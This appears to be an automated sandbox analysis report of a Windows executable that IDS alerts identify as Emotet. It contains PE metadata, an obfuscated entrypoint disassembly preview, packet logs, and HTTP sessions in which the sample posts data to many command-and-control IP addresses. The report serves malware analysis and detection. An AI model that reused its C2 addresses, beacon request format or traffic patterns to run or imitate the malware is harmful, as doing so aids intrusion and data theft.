SHA1:	48d8297b4a9debaa7b777f877019ce73777fbaed
SHA256:	4fc5f4f5462c4a65137c2121d4af6faae8e39aeb164842073a7e361527e879e5
SHA512:	3b67a27f5d2346201427d1b11bed311d7cd1b7439d63790b097a79b7cc7cce8b6602a382cfc3300539a17f8d726db13a41229b6e314b87f52c9434ff68669daf
SSDEEP:	768:S4TAjkyUEfZGvPpNPqzvuhR/2Q293H7lbqne6ZlOS/1XlkcROFsNjle23:SYpEfoHpNSzvuhk9XxMe6/tXlLdle
TLSH:	D4B30713BD86E7B7ED99D0F91299B1325A6BE83153434EE3633434D2CD22AE409B438D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...".J.....R.p.....R.K.....Rich/...................PE..L...Imj_.............................Z............@........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x405ad0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F6A6D49 [Tue Sep 22 21:31:53 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
call 00007F6C0921A6F0h
mov eax, dword ptr [0040DC08h]
test eax, eax
jne 00007F6C09219E9Dh
mov ecx, FC2B3A39h
call 00007F6C092180ADh
mov edx, CBEC572Eh
mov ecx, eax
call 00007F6C09218001h
mov dword ptr [0040DC08h], eax
push 00000000h
call eax
retn 0010h
push ecx
mov dword ptr [esp], 0000A2E6h
add dword ptr [esp], FFFF7562h
add dword ptr [esp], 0000A078h
add dword ptr [esp], 0000E5E0h
add dword ptr [esp], FFFF3334h
xor dword ptr [esp], 0000D094h
mov eax, dword ptr [esp]
pop ecx
ret
push ecx
mov dword ptr [esp], 0000FA5Dh
xor dword ptr [esp], F1A223BDh
add dword ptr [esp], FFFF6D32h
shl dword ptr [esp], 10h
shl dword ptr [esp], 06h
or dword ptr [esp], F886370Ch
xor dword ptr [esp], 7EE3CF9Fh
xor dword ptr [esp], 8265F833h
mov eax, dword ptr [esp]
pop ecx
ret
int3
int3
int3
int3
int3
int3
int3
int3
push ecx
mov dword ptr [esp], 0000C5A7h
mov eax, BACF914Dh
mov ecx, dword ptr [esp]
mul ecx
mov eax, CCCCCCCDh
sub ecx, edx
shr ecx, 1
add ecx, edx
shr ecx, 05h
mov dword ptr [esp], ecx
add dword ptr [esp], 00005C43h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x1086c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf000	0x6f8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa414	0xa600	e7cc42b73cead3402805381dd905f35a	False	0.5446159638554217	data	6.784082086728776	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x2	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x18bc	0xc00	4167e51df8e443e63cd314d7aedaa4d7	False	0.8297526041666666	data	7.290256002041044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xf000	0x6f8	0x800	5badcb3381e3a2c196449dac289bce10	False	0.77197265625	data	6.257800178446006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x1086c	0x10a00	6f6ad4f970d17eba523a27c49c1a5aff	False	0.0026580122180451127	data	0.010291792732545248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_RCDATA	0x1006c	0x10800	data			0.0019679214015151515

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T18:19:44.132415+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49704	177.23.7.151	80	TCP
2024-11-11T18:19:44.132415+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49704	177.23.7.151	80	TCP
2024-11-11T18:19:48.724884+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	49707	TCP
2024-11-11T18:19:55.423980+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49705	95.85.33.23	8080	TCP
2024-11-11T18:19:55.423980+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49705	95.85.33.23	8080	TCP
2024-11-11T18:20:00.010809+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49805	192.232.229.54	7080	TCP
2024-11-11T18:20:00.010809+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49805	192.232.229.54	7080	TCP
2024-11-11T18:20:11.143464+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49827	46.101.58.37	8080	TCP
2024-11-11T18:20:11.143464+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49827	46.101.58.37	8080	TCP
2024-11-11T18:20:23.732625+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49910	70.32.115.157	8080	TCP
2024-11-11T18:20:23.732625+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49910	70.32.115.157	8080	TCP
2024-11-11T18:20:26.471992+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	49982	TCP
2024-11-11T18:20:26.817308+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49983	111.67.12.221	8080	TCP
2024-11-11T18:20:26.817308+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49983	111.67.12.221	8080	TCP
2024-11-11T18:20:38.793014+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49984	98.13.75.196	80	TCP
2024-11-11T18:20:38.793014+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49984	98.13.75.196	80	TCP
2024-11-11T18:20:42.795138+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49985	5.196.35.138	7080	TCP
2024-11-11T18:20:54.808412+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49986	74.58.215.226	80	TCP
2024-11-11T18:20:54.808412+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49986	74.58.215.226	80	TCP
2024-11-11T18:21:06.802079+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49989	186.70.127.199	8090	TCP
2024-11-11T18:21:06.802079+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49989	186.70.127.199	8090	TCP
2024-11-11T18:21:19.028845+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49990	1.226.84.243	8080	TCP
2024-11-11T18:21:19.028845+0100	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	192.168.2.5	49990	1.226.84.243	8080	TCP
2024-11-11T18:21:31.114013+0100	2030868	ET MALWARE Win32/Emotet CnC Activity (POST) M10	1	192.168.2.5	49991	12.162.84.2	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 18:19:42.372733116 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:42.377868891 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:42.377938986 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:42.378078938 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:42.378108025 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:42.382910967 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:42.382934093 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:42.382953882 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:42.382962942 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:42.382973909 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:44.132297039 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:44.132415056 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:44.132607937 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:44.132613897 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:44.132657051 CET	49704	80	192.168.2.5	177.23.7.151
Nov 11, 2024 18:19:44.137605906 CET	80	49704	177.23.7.151	192.168.2.5
Nov 11, 2024 18:19:46.931725979 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:47.083909035 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:47.084053040 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:47.084258080 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:47.084319115 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:47.089044094 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:47.089164019 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:47.089174986 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:47.089210033 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:47.089219093 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:55.423873901 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:55.423979998 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:55.424099922 CET	49705	8080	192.168.2.5	95.85.33.23
Nov 11, 2024 18:19:55.429027081 CET	8080	49705	95.85.33.23	192.168.2.5
Nov 11, 2024 18:19:59.600291967 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:19:59.605340004 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:19:59.605442047 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:19:59.605706930 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:19:59.605763912 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:19:59.610676050 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:19:59.610794067 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:19:59.610805035 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:19:59.610816956 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:19:59.610827923 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:20:00.010669947 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:20:00.010808945 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:20:00.011029005 CET	49805	7080	192.168.2.5	192.232.229.54
Nov 11, 2024 18:20:00.016829014 CET	7080	49805	192.232.229.54	192.168.2.5
Nov 11, 2024 18:20:02.799365997 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:02.804371119 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:02.804505110 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:02.804625988 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:02.804663897 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:02.809525013 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:02.809536934 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:02.809566021 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:02.809575081 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:02.809737921 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:11.143389940 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:11.143464088 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:11.144231081 CET	49827	8080	192.168.2.5	46.101.58.37
Nov 11, 2024 18:20:11.150329113 CET	8080	49827	46.101.58.37	192.168.2.5
Nov 11, 2024 18:20:14.944189072 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:15.393939018 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:15.394066095 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:15.394347906 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:15.394390106 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:15.401778936 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:15.401849031 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:15.402652979 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:15.402791977 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:15.402801991 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:23.732526064 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:23.732625008 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:23.732721090 CET	49910	8080	192.168.2.5	70.32.115.157
Nov 11, 2024 18:20:23.737627029 CET	8080	49910	70.32.115.157	192.168.2.5
Nov 11, 2024 18:20:26.273328066 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.278342009 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.278485060 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.278662920 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.278700113 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.283842087 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.283900023 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.283932924 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.283942938 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.284020901 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.817042112 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:26.817307949 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.817456007 CET	49983	8080	192.168.2.5	111.67.12.221
Nov 11, 2024 18:20:26.822338104 CET	8080	49983	111.67.12.221	192.168.2.5
Nov 11, 2024 18:20:30.455580950 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:30.460555077 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:30.460633993 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:30.460777998 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:30.460812092 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:30.465884924 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:30.465934992 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:30.465985060 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:30.466061115 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:30.466069937 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:38.792929888 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:38.793014050 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:38.793102980 CET	49984	80	192.168.2.5	98.13.75.196
Nov 11, 2024 18:20:38.797904968 CET	80	49984	98.13.75.196	192.168.2.5
Nov 11, 2024 18:20:42.383889914 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.388889074 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.388978004 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.389178991 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.389218092 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.393954992 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.394028902 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.394038916 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.394433975 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.394469023 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.794977903 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:42.795137882 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.795342922 CET	49985	7080	192.168.2.5	5.196.35.138
Nov 11, 2024 18:20:42.800206900 CET	7080	49985	5.196.35.138	192.168.2.5
Nov 11, 2024 18:20:46.464622974 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:46.469784021 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:46.469872952 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:46.470030069 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:46.470077991 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:46.474996090 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:46.475016117 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:46.475025892 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:46.475037098 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:46.475272894 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:54.808249950 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:54.808412075 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:54.808612108 CET	49986	80	192.168.2.5	74.58.215.226
Nov 11, 2024 18:20:54.813966036 CET	80	49986	74.58.215.226	192.168.2.5
Nov 11, 2024 18:20:58.457366943 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:20:58.462425947 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:20:58.462527990 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:20:58.462727070 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:20:58.462786913 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:20:58.467744112 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:20:58.467758894 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:20:58.467767954 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:20:58.467777967 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:20:58.467871904 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:21:06.801879883 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:21:06.802078962 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:21:06.802246094 CET	49989	8090	192.168.2.5	186.70.127.199
Nov 11, 2024 18:21:06.806974888 CET	8090	49989	186.70.127.199	192.168.2.5
Nov 11, 2024 18:21:10.455652952 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:10.671499968 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:10.671633005 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:10.671874046 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:10.671926975 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:10.676651001 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:10.676810026 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:10.676820040 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:10.676827908 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:10.679944992 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:19.028773069 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:19.028845072 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:19.028932095 CET	49990	8080	192.168.2.5	1.226.84.243
Nov 11, 2024 18:21:19.033759117 CET	8080	49990	1.226.84.243	192.168.2.5
Nov 11, 2024 18:21:22.755518913 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:22.760776997 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:22.760898113 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:22.761102915 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:22.761157990 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:22.765904903 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:22.766053915 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:22.766063929 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:22.766098976 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:22.766235113 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:31.113861084 CET	8080	49991	12.162.84.2	192.168.2.5
Nov 11, 2024 18:21:31.114012957 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:31.114120960 CET	49991	8080	192.168.2.5	12.162.84.2
Nov 11, 2024 18:21:31.118925095 CET	8080	49991	12.162.84.2	192.168.2.5

HTTP Request Dependency Graph

177.23.7.151

95.85.33.23

95.85.33.23:8080

192.232.229.54

192.232.229.54:7080

46.101.58.37

46.101.58.37:8080

70.32.115.157

70.32.115.157:8080

111.67.12.221

111.67.12.221:8080

98.13.75.196

5.196.35.138

5.196.35.138:7080

74.58.215.226

186.70.127.199

186.70.127.199:8090

1.226.84.243

1.226.84.243:8080

12.162.84.2

12.162.84.2:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	177.23.7.151	80	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:19:42.378078938 CET	602	OUT	POST /3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=------------c1rFprRPYfa1 Host: 177.23.7.151 Content-Length: 4676 Cache-Control: no-cache
Nov 11, 2024 18:19:42.378108025 CET	4676	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 31 72 46 70 72 52 50 59 66 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 65 63 67 79 73 65 22 3b 20 66 69 6c 65 Data Ascii: --------------c1rFprRPYfa1Content-Disposition: form-data; name="eecgyse"; filename="gtgueorflpckccfscid"Content-Type: application/octet-streamj:vLZ*h]9N\{@ \EY\T: _Nc[Zc+^,-t<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	95.85.33.23	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:19:47.084258080 CET	535	OUT	POST /0POplCNbRBZ4or4A/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 95.85.33.23/0POplCNbRBZ4or4A/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------------------czaXol8AYsgziFOrfodC Host: 95.85.33.23:8080 Content-Length: 4676 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49805	192.232.229.54	7080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:19:59.605706930 CET	541	OUT	POST /xbe2duP8y5opIK2l/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 192.232.229.54/xbe2duP8y5opIK2l/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------------------obA8YhSs1fssjgUX6Gq8 Host: 192.232.229.54:7080 Content-Length: 4660 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49827	46.101.58.37	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:02.804625988 CET	657	OUT	POST /Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 46.101.58.37/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-----------------------mZOPwTXQDnkMiVqVaBOtPqF Host: 46.101.58.37:8080 Content-Length: 4660 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
